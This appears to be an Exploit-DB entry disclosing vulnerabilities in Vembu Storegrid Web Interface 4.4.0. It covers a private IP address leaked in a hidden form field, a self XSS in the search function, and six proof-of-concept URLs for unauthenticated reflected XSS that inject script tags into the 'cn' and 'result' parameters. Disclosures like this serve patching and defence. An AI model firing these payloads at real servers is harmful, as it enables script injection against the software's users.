header-logo
Suggest Exploit
vendor:
Storegrid Web Interface
by:
Gionathan 'John' Reale
5.3
CVSS
MEDIUM
Information Disclosure, Reflected XSS, Self XSS
200,79,791
CWE
Product Name: Storegrid Web Interface
Affected Version From: 4.4.0
Affected Version To: 4.4.0
Patch Exists: YES
Related CWE: CVE-2014-10078,CVE-2014-10079
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

Vembu Storegrid Web Interface 4.4.0 – Multiple Vulnerabilities

The front page of the server web interface leaks the private IP address in the hidden form 'ipaddress' around line 80. The server web interface contains multiple reflected XSS exploits that do not require authentication. The server web interface contains a self XSS in the search function.

Mitigation:

Ensure that the web interface is not exposed to the public internet and that all users are authenticated before accessing the web interface.
Source

Exploit-DB raw data:

# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities 
# Discovery Date: 2018-12-05 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.vembu.com/ 
# Software Link : N/A
# Google Dork: N/A
# Version: 4.4.0 
# CVE : CVE-2014-10078,CVE-2014-10079
Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities. 
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 
Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80. 
========================================================================================================================== 
Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication. 
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= 
https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= 
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= 
https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> 
https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> 
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> 
============================================================================================================================= 
Self XSS. The server web interface contains a self XSS in the search function. 
==============================================================================================================================